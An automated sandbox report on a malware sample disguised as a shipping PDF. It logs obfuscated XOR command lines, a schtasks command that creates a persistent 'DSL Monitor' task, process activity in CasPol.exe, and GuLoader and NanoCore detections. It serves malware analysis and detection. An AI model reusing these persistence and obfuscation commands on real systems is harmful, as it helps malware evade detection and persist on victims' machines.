Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7578^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216675^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x10307B37^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DD1.tmp

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File created: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB

Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

File created: C:\Users\user\AppData\Local\Temp\nsiB404.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@192/15@92/3

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Code function: 1_2_004021AA CoCreateInstance,

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Code function: 1_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{8a31290f-d587-43a1-8a5b-8b2e6c04b993}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Source: Original Shipment_Document.PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000088.00000000.185799522780.0000000000E30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.185975230036.0000000003280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Obfuscated command line found

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7578^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216675^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x10307B37^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15733C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697C2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6678^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A6B6F7F^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7578^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
